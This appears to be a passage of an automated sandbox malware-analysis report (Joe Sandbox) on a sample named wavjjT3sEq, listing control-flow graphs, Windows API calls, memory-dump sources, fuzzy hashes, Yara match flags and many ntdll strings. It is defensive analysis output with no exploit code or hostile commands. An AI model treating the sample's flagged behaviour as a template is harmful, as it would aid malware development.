                                                                                                                                                              control_flow_graph 87 1962c70-1962c7c LdrInitializeThunk
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 8055aea14ab7b88b25826921186c591e568560d36c90202e13de019ae869baf3
                                                                                                                                                              • Instruction ID: c4e71a7086309dd2fe3367d763fcf027edf77506a9fbc6924d95cec9ac6a08c2
                                                                                                                                                              • Opcode Fuzzy Hash: 8055aea14ab7b88b25826921186c591e568560d36c90202e13de019ae869baf3
                                                                                                                                                              • Instruction Fuzzy Hash: 8D90023120158802D1147158840C74A40499BD0301F59C421A4464658DC69589917221

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 89 19635c0-19635cc LdrInitializeThunk
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: f04a9be9ef99b2f2feb17b9d2beb60f1f9fb6f6a528a03d08e6960eb55dc3bc3
                                                                                                                                                              • Instruction ID: 1ae0065d480f3158949c3ded3739873f828b38a783ab809c5d9955b2036f13fa
                                                                                                                                                              • Opcode Fuzzy Hash: f04a9be9ef99b2f2feb17b9d2beb60f1f9fb6f6a528a03d08e6960eb55dc3bc3
                                                                                                                                                              • Instruction Fuzzy Hash: A690023160560402D1047158451C70650499BD0201F65C421A0464568DC7958A5166A2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: beb166f2f31674ca0194f9ee58dc63f016d9e29546bd61792ba9995930bc2e0f
                                                                                                                                                              • Instruction ID: f9d03b9ff702a6edd69873a54119a3cec207fd6993dcfd5f3d7ac27671c8dd22
                                                                                                                                                              • Opcode Fuzzy Hash: beb166f2f31674ca0194f9ee58dc63f016d9e29546bd61792ba9995930bc2e0f
                                                                                                                                                              • Instruction Fuzzy Hash: 94F17FB1D0031AAFDF24DFA4CC85AAEF7B9BF54300F1482A9F515A7241DB705A45CBA1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b797360d5877a4945d69cd5edff270cddb8fd420988690ff83d2f09e51c66b6f
                                                                                                                                                              • Instruction ID: 1a91bf36052d594462b9201d3ea82a4c40a45753edf89efdd8815479e4d3d9ea
                                                                                                                                                              • Opcode Fuzzy Hash: b797360d5877a4945d69cd5edff270cddb8fd420988690ff83d2f09e51c66b6f
                                                                                                                                                              • Instruction Fuzzy Hash: 67313272B001645BDB2CC508DC612A9B7B2EBE4350F58826AEA06DF7D0F624AE2087C1

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • PostThreadMessageW.USER32(1863I7301,00000111,00000000,00000000), ref: 00134260
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                              • String ID: 1863I7301$1863I7301
                                                                                                                                                              • API String ID: 1836367815-3745599348
                                                                                                                                                              • Opcode ID: f82b3489c07bb7bba87b4eb726f7e6691780f768484c8221fa741478fa425193
                                                                                                                                                              • Instruction ID: f09638a10f08f94f22d6d42bed849da367c872367f93b1cbcb37bff2b23f77f5
                                                                                                                                                              • Opcode Fuzzy Hash: f82b3489c07bb7bba87b4eb726f7e6691780f768484c8221fa741478fa425193
                                                                                                                                                              • Instruction Fuzzy Hash: 3201D271D40218B7EB21AAE09C42FEFBB7C9F41B50F148055FA047B2C2D7B466068BE6

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • PostThreadMessageW.USER32(1863I7301,00000111,00000000,00000000), ref: 00134260
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                              • String ID: 1863I7301$1863I7301
                                                                                                                                                              • API String ID: 1836367815-3745599348
                                                                                                                                                              • Opcode ID: a3f97eb2583523ad50d7cc5734a062fdc3966a9ffe998e370a34981ffe5104b2
                                                                                                                                                              • Instruction ID: 952492a2f8fe81b3cb07ba159b2ef30471805c95655c560ce3c163783df6884f
                                                                                                                                                              • Opcode Fuzzy Hash: a3f97eb2583523ad50d7cc5734a062fdc3966a9ffe998e370a34981ffe5104b2
                                                                                                                                                              • Instruction Fuzzy Hash: 5901D271D40218B7EB21AAE09C42FEFBB7C9F41B50F148055FA047B2C2D7B466068BE6

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 62 14cbe3-14cc27 call 124843 call 14db13 RtlAllocateHeap
                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,0013E7BE,?,?,00000000,?,0013E7BE,?,?,?), ref: 0014CC22
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                              • Opcode ID: b6deca932c6654ca86d4eb412088f9019d810c86403fd3c820abf9ad62f2039c
                                                                                                                                                              • Instruction ID: 0fdf89c1ebfcbd9fa41aeb357431ae20e3c038677fa5cd7d0596892682ea4f15
                                                                                                                                                              • Opcode Fuzzy Hash: b6deca932c6654ca86d4eb412088f9019d810c86403fd3c820abf9ad62f2039c
                                                                                                                                                              • Instruction Fuzzy Hash: 6EE06D712042047BDA10EE98EC41FDB33ACEF85710F000018FA08A7241E770B9108AB4

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 67 14cc33-14cc77 call 124843 call 14db13 RtlFreeHeap
                                                                                                                                                              APIs
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C4830C75,00000007,00000000,00000004,00000000,0013720F,000000F4), ref: 0014CC72
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                              • Opcode ID: 38eafd8a1ea63597223e5a1425a7c26f04ed257e1e495f63d6fb01429785e211
                                                                                                                                                              • Instruction ID: 83a2bf3d18633961454cb89043822baef1f63ec84093ea4fc48d8479eb178bb6
                                                                                                                                                              • Opcode Fuzzy Hash: 38eafd8a1ea63597223e5a1425a7c26f04ed257e1e495f63d6fb01429785e211
                                                                                                                                                              • Instruction Fuzzy Hash: 03E0ED753142157BDA14EE99EC41EAB77ACEF85750F104419FA08A7242DB70B9148BB4

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 77 14cc83-14ccbc call 124843 call 14db13 ExitProcess
                                                                                                                                                              APIs
                                                                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,174F840D,?,?,174F840D), ref: 0014CCB7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                              • Opcode ID: 657fc2068f50c85c9734239eb842ba7256170667a099f2beb8aaa4f4faf4d97b
                                                                                                                                                              • Instruction ID: 03004fa31b2ff833c863c4e11626e06cdb840bfb5eb5eb1065b9adb4de4b2507
                                                                                                                                                              • Opcode Fuzzy Hash: 657fc2068f50c85c9734239eb842ba7256170667a099f2beb8aaa4f4faf4d97b
                                                                                                                                                              • Instruction Fuzzy Hash: 67E04F312002147BD620EA6AEC42F9B775CDFC6750F004029FA0CA7242D670BA1086B4

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 82 1962c0a-1962c0f 83 1962c11-1962c18 82->83 84 1962c1f-1962c26 LdrInitializeThunk 82->84
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-2160512332
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-3089669407
                                                                                                                                                              Strings
                                                                                                                                                              • @, xrefs: 019C6277
                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 019C5FE1
                                                                                                                                                              • Control Panel\Desktop, xrefs: 019C615E
                                                                                                                                                              • LanguageConfigurationPending, xrefs: 019C6221
                                                                                                                                                              • @, xrefs: 019C647A
                                                                                                                                                              • @, xrefs: 019C6027
                                                                                                                                                              • InstallLanguageFallback, xrefs: 019C6050
                                                                                                                                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 019C5A84
                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 019C635D
                                                                                                                                                              • @, xrefs: 019C61B0
                                                                                                                                                              • PreferredUILanguages, xrefs: 019C63D1
                                                                                                                                                              • PreferredUILanguagesPending, xrefs: 019C61D2
                                                                                                                                                              • LanguageConfiguration, xrefs: 019C6420
                                                                                                                                                              • @, xrefs: 019C63A0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                                                              • API String ID: 0-1325123933
                                                                                                                                                              Strings
                                                                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019954E2
                                                                                                                                                              • corrupted critical section, xrefs: 019954C2
                                                                                                                                                              • 8, xrefs: 019952E3
                                                                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01995543
                                                                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019954CE
                                                                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0199540A, 01995496, 01995519
                                                                                                                                                              • Critical section address., xrefs: 01995502
                                                                                                                                                              • Critical section address, xrefs: 01995425, 019954BC, 01995534
                                                                                                                                                              • Critical section debug info address, xrefs: 0199541F, 0199552E
                                                                                                                                                              • double initialized or corrupted critical section, xrefs: 01995508
                                                                                                                                                              • Invalid debug info address of this critical section, xrefs: 019954B6
                                                                                                                                                              • Address of the debug info found in the active list., xrefs: 019954AE, 019954FA
                                                                                                                                                              • Thread identifier, xrefs: 0199553A
                                                                                                                                                              • undeleted critical section in freed memory, xrefs: 0199542B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                              • API String ID: 0-2368682639
                                                                                                                                                              Strings
                                                                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01992409
                                                                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01992624
                                                                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01992498
                                                                                                                                                              • @, xrefs: 0199259B
                                                                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019922E4
                                                                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0199261F
                                                                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01992602
                                                                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01992506
                                                                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019924C0
                                                                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01992412
                                                                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019925EB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                              • API String ID: 0-4009184096
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                                                                              • API String ID: 0-360209818
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                              • API String ID: 0-2515994595
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                                              • API String ID: 0-3591852110
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                                                              • API String ID: 0-3197712848
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                              • API String ID: 0-3532704233
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                                                              • API String ID: 0-1357697941
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                              • API String ID: 0-1700792311
                                                                                                                                                              Strings
                                                                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 019A8B8F
                                                                                                                                                              • VerifierDebug, xrefs: 019A8CA5
                                                                                                                                                              • VerifierDlls, xrefs: 019A8CBD
                                                                                                                                                              • HandleTraces, xrefs: 019A8C8F
                                                                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 019A8A3D
                                                                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 019A8A67
                                                                                                                                                              • VerifierFlags, xrefs: 019A8C50
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                              • API String ID: 0-3223716464
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                              • API String ID: 0-1109411897
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-523794902
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                                                                              • API String ID: 0-4098886588
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                              • API String ID: 0-122214566
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
